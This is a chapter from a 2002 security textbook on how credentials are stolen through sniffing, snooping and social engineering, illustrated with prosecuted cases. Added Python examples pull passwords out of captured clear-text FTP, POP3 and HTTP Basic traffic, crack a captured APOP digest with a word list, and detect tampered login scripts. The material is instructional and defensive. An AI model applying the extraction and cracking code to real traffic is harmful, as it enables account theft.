Stolen Credentials


A user's credentials consist of an identifier that distinguishes the user (the user ID) and the secret used to authenticate that identity (typically a password). The first rule of computer security is: Do not share your password. Nevertheless, stolen passwords continue to be a significant security issue, because an attacker does not need the user's cooperation to obtain them.

Sniffing

Sniffing is the process of monitoring a communication medium in an attempt to gather information, in this case identification and authentication information. Password sniffing is effective because of the use of reusable passwords and the use of protocols which transmit user IDs and passwords across the network in clear text; telnet, FTP, POP3 and HTTP Basic authentication are familiar examples. On a shared medium such as a hub-based Ethernet segment or an unencrypted wireless network, any host in the broadcast domain can capture this traffic, so stealing credentials becomes a trivial task.

Ikenna Iffih used his home computer to illegally gain access to a number of computers, including those controlled by NASA and an agency of the U.S. Department of Defense, where, among other things, he installed a "sniffer" program onto the system to intercept login names and passwords, and intentionally caused delays in communications.

He was charged with intentionally intercepting and endeavoring to intercept login names and passwords transmitted to and through a NASA computer.

Iffih was sentenced to 2 years of probation, the first 6 months of which must be served under home confinement. Additionally, the Court ordered him to pay $5,000 in restitution and to forfeit all computer equipment used to commit the crime. Lastly, Iffih is banned from using computers for any other purpose than work or school. [48]

[48] "Boston Computer Hacker Sentenced for Illegal Access and Use of United States Government and Private Systems," FBI Boston Field Office Press Release.

Any password which is sent over a network in clear text has to be considered compromised. Even if the password is hashed or encrypted before transmission, a captured hash or challenge-response value can be attacked offline: the attacker hashes guesses from a word list in the same way the client did and compares the result with the captured value, recovering the user ID and password pair without ever contacting the server. Numerous implementations have used weak or unsalted password encoding that makes this guessing cheap, and some captured values can simply be replayed.
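The two points above, clear-text credentials lifted straight from a capture and a hashed credential recovered by offline guessing, as an added example (not code from the book): a small extractor that pulls user ID and password pairs out of captured FTP, POP3 and HTTP Basic traffic, and a dictionary attack against a captured APOP response (RFC 1939 defines APOP as MD5 over the server's timestamp banner followed by the password). The capture lines, hosts, names, passwords and word list are all constructed for the example; the "proto src > dst: payload" line format is an assumption standing in for whatever a real sniffer would emit.

```python
import base64
import hashlib
import re

# Constructed sample of captured application-layer messages, one per line,
# in an assumed "proto src > dst: payload" format. Hosts, user names and
# passwords are invented for this example.
CAPTURED_CLEARTEXT = [
    "ftp 10.0.0.5 > 10.0.0.9: USER alice",
    "ftp 10.0.0.5 > 10.0.0.9: PASS s3cret!",
    "pop3 10.0.0.7 > 10.0.0.9: USER bob",
    "pop3 10.0.0.7 > 10.0.0.9: PASS hunter2",
    "http 10.0.0.8 > 10.0.0.9: GET /admin HTTP/1.0",
    "http 10.0.0.8 > 10.0.0.9: Authorization: Basic Y2Fyb2w6bGV0bWVpbg==",
]

LINE_RE = re.compile(r"^(?P<proto>\w+) (?P<src>\S+) > (?P<dst>\S+): (?P<payload>.*)$")


def extract_cleartext_credentials(lines):
    """Return (proto, source host, user, password) for every credential
    that crosses the wire unprotected in the captured lines."""
    found = []
    pending_user = {}  # (proto, src) -> user name from the last USER command
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        proto, src, payload = m["proto"], m["src"], m["payload"]
        key = (proto, src)
        if proto in ("ftp", "pop3"):
            # Both protocols send USER and PASS as separate clear-text commands.
            verb, _, arg = payload.partition(" ")
            if verb.upper() == "USER":
                pending_user[key] = arg.strip()
            elif verb.upper() == "PASS" and key in pending_user:
                found.append((proto, src, pending_user.pop(key), arg))
        elif proto == "http":
            # HTTP Basic is only base64-encoded, not encrypted.
            hm = re.match(r"Authorization:\s*Basic\s+(\S+)", payload, re.I)
            if hm:
                try:
                    decoded = base64.b64decode(hm.group(1), validate=True).decode()
                except (ValueError, UnicodeDecodeError):
                    continue
                user, sep, password = decoded.partition(":")
                if sep:
                    found.append((proto, src, user, password))
    return found


def apop_digest(challenge: str, password: str) -> str:
    """APOP response as defined in RFC 1939: MD5 over the server's
    timestamp banner concatenated with the shared secret."""
    return hashlib.md5((challenge + password).encode()).hexdigest()


# Constructed capture of an APOP exchange. The digest is generated here from
# the invented password so that the sample is self-consistent; on the wire
# the attacker would see only the banner and the hex digest.
APOP_CHALLENGE = "<1896.697170952@mail.example.invalid>"
APOP_USER = "dave"
APOP_CAPTURED_DIGEST = apop_digest(APOP_CHALLENGE, "winter2001")

# Constructed word list for the offline guessing step.
WORDLIST = ["password", "letmein", "summer2001", "winter2001", "qwerty"]


def crack_apop(challenge, digest, wordlist):
    """Offline dictionary attack: hash each guess exactly as the client did
    and compare with the captured digest. No traffic to the server, so no
    lockout and no log entry."""
    for guess in wordlist:
        if apop_digest(challenge, guess) == digest:
            return guess
    return None


if __name__ == "__main__":
    for proto, src, user, password in extract_cleartext_credentials(CAPTURED_CLEARTEXT):
        print(f"{proto:5} {src:10} {user}:{password}")
    print("APOP", APOP_USER, "->", crack_apop(APOP_CHALLENGE, APOP_CAPTURED_DIGEST, WORDLIST))
```

The APOP half is the general form of the "hashed but still guessable" problem: any scheme where the verifier can be computed from the captured exchange and a candidate password alone (unsalted hashes, most challenge-response schemes of the period) falls to a word list at the attacker's leisure. The remedy is an encrypted channel (SSH, TLS) or a one-time credential, not a stronger hash of a reusable password.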

Snooping

Snooping is the process of observing a user's activity, either visually at his or her terminal device or with software on the user's own machine. Trojan horses and parasites in the display software or input drivers have been used to observe keyboard and mouse input on Windows desktops, X Window System displays and web browsers. The locally collected information can be stored for later pickup or sent to the hacker. This type of attack succeeds even when communications are encrypted, since the information is stolen before it is sent, at the point where the user types it.

Jesus Oquendo worked as a computer security specialist at Collegeboardwalk.com, which shared office space and a computer network with one of its investors, Five Partners Asset Management LLC, a venture capital company. Oquendo used this access to alter the start-up commands on the Five Partners' network to automatically collect passwords and e-mail them to himself.

Using these passwords, Oquendo accessed Five Partners systems and the computer systems of RCS Computer Experience, where he deleted a database, costing RCS approximately $60,000 to repair. Finally, he left the victim a taunting message on their network: "Hello, I have just hacked into your system. Have a nice day." [49]

[49] "New York City Computer Security Expert Convicted of Computer Hacking and Electronic Eavesdropping," U.S. Department of Justice Press Release, 7 March 2001.
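The Oquendo case above turned on altered start-up commands, which is the kind of change a file-integrity baseline catches. The following is an added example (not code from the book) of that check: it records a SHA-256 digest of each login script, then reports any script that has been modified or removed since. The list of script names and the sample home directory, built in a temporary directory with constructed contents and a constructed tampering line, are assumptions for the example.

```python
import hashlib
import os
import tempfile

# Scripts that run automatically at login; an attacker who can write to them
# can insert commands that capture passwords before any encryption happens.
# This list is an assumption for the example; a real baseline would cover
# every boot and login script on the system, including system-wide ones.
STARTUP_FILES = [".profile", ".bashrc", ".xsession"]


def sha256_of(path):
    """Digest a file in chunks so large scripts do not need to be read at once."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(home):
    """Record the digest of every start-up script that currently exists."""
    baseline = {}
    for name in STARTUP_FILES:
        path = os.path.join(home, name)
        if os.path.isfile(path):
            baseline[name] = sha256_of(path)
    return baseline


def check_against_baseline(home, baseline):
    """Classify each baselined script as unchanged, modified or missing."""
    report = {}
    for name, expected in baseline.items():
        path = os.path.join(home, name)
        if not os.path.isfile(path):
            report[name] = "missing"
        elif sha256_of(path) != expected:
            report[name] = "modified"
        else:
            report[name] = "unchanged"
    return report


def demo():
    """Build a constructed home directory, baseline it, tamper with one
    script, and return the check's report."""
    with tempfile.TemporaryDirectory() as home:
        # Constructed, harmless contents standing in for real login scripts.
        samples = {
            ".profile": "export PATH=$HOME/bin:$PATH\n",
            ".bashrc": "alias ll='ls -l'\n",
            ".xsession": "exec xterm\n",
        }
        for name, text in samples.items():
            with open(os.path.join(home, name), "w") as f:
                f.write(text)
        baseline = build_baseline(home)

        # Constructed tampering: a line appended to .profile after the
        # baseline was taken, the way altered start-up commands would appear.
        with open(os.path.join(home, ".profile"), "a") as f:
            f.write("# injected line (constructed for the example)\n")

        return check_against_baseline(home, baseline)


if __name__ == "__main__":
    for name, status in demo().items():
        print(f"{name:10} {status}")
```

The baseline itself must be stored where the attacker cannot rewrite it (off the host, or signed), and the check has to run before the login scripts do, or from a separate schedule, since an attacker who owns the account also owns the scripts that would otherwise launch the check. It detects tampering after the fact; it does not prevent it.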

Social Engineering

Social engineering is the process of obtaining information through the use of a false pretense.

Simply asking an individual for his password may seem too crude to work on experienced users, but there have been numerous reports of very simple techniques that have been successful. The request could come in the form of an e-mail message, a broadcast, or a telephone call.

Intruders are using automated tools to post messages to trick unsuspecting users of Internet Relay Chat (IRC) and Instant Messaging (IM) services into downloading and executing malicious software. These messages typically offer the opportunity to download software of some value to the user, including improved music downloads, anti-virus protection, or pornography.

This is purely a social engineering attack since the user's decision to download and run the software is the deciding factor in whether or not the attack is successful. Although this activity is not novel, the technique is still effective, as evidenced by reports of tens of thousands of systems being compromised in this manner. [50]

[50] "Social Engineering Attacks via IRC and Instant Messaging," CERT Incident Note IN-2002-03, 19 March 2002.

The request may instruct the user to change his password immediately, usually citing testing or a security issue. The user is further instructed either to change the password to one specified in the message, or to run a program that prompts for his user ID and password, which are then collected by the attacker. The message can appear to come from a site administrator or root. In reality, it may have been sent by an individual who is trying to gain access to, or additional privileges on, the local machine via the user's account.

There should be a procedure to authenticate requests to change passwords or to run programs that request password information, so that users can be assured these requests are legitimate; calling the help desk back on a known number, rather than replying to the message, is the simplest such check. There should also be a well-defined process to report such attempts so that they can be tracked and the attacker identified.



Halting the Hacker: A Practical Guide to Computer Security (2nd Edition)
ISBN: 0130464163
Year: 2002
Pages: 210
